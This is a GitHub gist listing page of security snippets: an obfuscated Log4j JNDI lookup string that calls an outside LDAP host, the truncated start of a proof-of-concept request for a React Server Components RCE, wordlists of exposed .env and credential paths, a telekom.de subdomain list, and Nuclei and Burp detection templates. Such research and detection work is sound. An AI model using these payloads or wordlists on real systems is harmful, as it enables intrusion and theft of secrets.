simokohonen
/ gist:c7b21f3d47e2e45613fec36f535547a1
Created
December 12, 2025 07:08
cisco_log4j_looking_things
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /${${1:-j}${fg:7:-n}${0:an:3d7:-d}${8l:-i}${36jv:co9p:-:}${a4:5p2:-l}${7c2r:hrw:-d}${5l6x:-a}${i:-p}${ml:7:fodr:-:}${93:-/}${sbt3:xl:-/}${vsfp:-P}${c:dr76:-A}${x8:mnft:8nt6:-l}${pntj:nt9:-0}${k6:-c}${rv:pbuh:--}${${qdcr:5e:f:-s}${rj9:-y}${vag6:np1:m1:-s}${bop:-:}${ku5x:-j}${y3:-a}${j:-v}${h7j8:-a}${3hg:5a:y4s:-.}${f:fij:6:-v}${ql:-e}${i0ew:kfju:vyfb:-r}${0q:1:hdql:-s}${zg:o8a:-i}${jrp:ht0:-o}${jo9:-n}}${d:-.}${r:7:-8}${34tz:zbp:-b}${v7g:-3}${g6x:-6}${umdk:-1}${6zgi:-6}${gek:-d}${4p0:eq7z:yv1:-3}${4v:m9l:s3:-5}${e:-e}${3g0u:8:cbo:-1}${sxv:03hs:mh:-9}${7klx:2u:-f}${x:pb:-d}${1e:i2gk:y:-8}${9cpw:n0ap:-2}${qm:3i:-d}${9i:nu1:-f}${kwh:07p:89j:-0}${h8z:a:-f}${o:v0jg:o3v:-4}${be8z:q3v:bt:-0}${4:q14:-6}${n:o:-0}${c:ucfk:o06p:-1}${6:-2}${n4:-2}${w0u:-f}${oc4h:n:g42:-5}${nciz:2kb:rz1l:-7}${0wl:ux8:-c}${z1:-8}${16s:on:8s:-3}${d:hzb:-3}${a:-8}${ki:qk1:-f}${pnk:d:-d}${ovai:-9}${d:-0}${orxs:j:-e}${cw:a:-2}${q:ml:-a}${im:towb:6c:-.}${h:794c:-d}${92op:7rz:-n}${189j:-s}${85t:p4k:--}${6:ph:-e}${s5:-x}${r9iy:-f}${w:i:iufr:-i |
maple3142
/ CVE-2025-55182.http
Last active
December 30, 2025 16:29
CVE-2025-55182 React Server Components RCE POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 | |
| Next-Action: x | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Length: 459 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" |
simokohonen
/ gist:d9b24e5066180c79ce4be1761bb9fa9e
Created
October 9, 2025 12:34
.env urls enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.env | |
| /.env.production | |
| /.env.www | |
| /.env-release.env | |
| /example/.env | |
| /.env | |
| /client/.env.production | |
| /node/.env_example | |
| /.env.test | |
| /.env.local |
reconeer
/ gist:5f20ad1150f8044cac80360a19a5a48a
Created
October 3, 2025 02:54
telekom.de 600 more subdomains than https://github.com/projectdiscovery/subfinder and https://subdomainfinder.c99.nl/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Reconeer lists 600 more subdomains than https://subdomainfinder.c99.nl/scans/2025-09-28/telekom.de and basic subfinder https://github.com/projectdiscovery/subfinder for telekom.de https://www.reconeer.com/domain/telekom.de https://github.com/reconeer/reconeer | |
| 1.ntp.time.telekom.de | |
| 3.ntp.time.telekom.de | |
| 2.ntp.time.telekom.de | |
| 4.ntp.time.telekom.de | |
| 5.ntp.time.telekom.de | |
| admin.pfau.telekom.de | |
| adsl-vp.telekom.de |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /Node.js/JavaScript | |
| /.git/hooks/pre-commit | |
| /.env.json | |
| /.cloudfront/keys.json | |
| /.git/refs/stash | |
| /admin/.env.old | |
| /.docker/.env | |
| /.env.docker.dev | |
| /api/aws/s3 | |
| /admin/wp-config.php.old |
bolhasec
/ CVE-2025-53833.yaml
Last active
October 12, 2025 00:37
Nuclei Template for CVE-2025-53833
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2025-53833 | |
| info: | |
| name: LaRecipe is vulnerable to Server-Side Template Injection attacks | |
| author: sushicomabacate | |
| severity: critical | |
| description: | | |
| LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch. | |
| reference: | |
| - https://www.cve.org/CVERecord?id=CVE-2025-53833 |
nullenc0de
/ aws.yaml
Last active
October 11, 2025 06:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: aws-iam-privilege-escalation | |
| info: | |
| name: AWS IAM Privilege Escalation Vectors | |
| author: nullenc0de | |
| severity: critical | |
| description: | | |
| Detects AWS IAM policies, credentials, metadata, and configurations that allow privilege escalation paths. | |
| Covers exposed credentials, overly permissive IAM policies, misconfigured metadata services, vulnerable role assumptions, and user-data scripts. | |
| reference: |
nullenc0de
/ huge_config.yaml
Created
June 3, 2025 13:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: sensitive-credential-files | |
| info: | |
| name: Sensitive Credential File Discovery | |
| author: security-researcher | |
| severity: high | |
| description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | |
| cvss-score: 7.5 |
nullenc0de
/ config.yaml
Last active
October 13, 2025 23:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: sensitive-credential-files | |
| info: | |
| name: Sensitive Credential File Discovery | |
| author: nullenc0de | |
| severity: high | |
| description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | |
| cvss-score: 7.5 |
fourcube
/ CVE-2025-29927.bcheck
Created
March 24, 2025 07:55
Burp BCheck for CVE-2025-29927 (Next.js middleware bypass)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| metadata: | |
| language: v2-beta | |
| name: "CVE-2025-29927 - Next.js middleware bypass" | |
| description: "Checks for differences in responses when using different x-middleware-subrequest header paths" | |
| author: "Chris Grieger - blueredix.com" | |
| tags: "next.js", "middleware" | |
| run for each: | |
| middleware_value = "pages/_middleware", | |
| "middleware", |
NewerOlder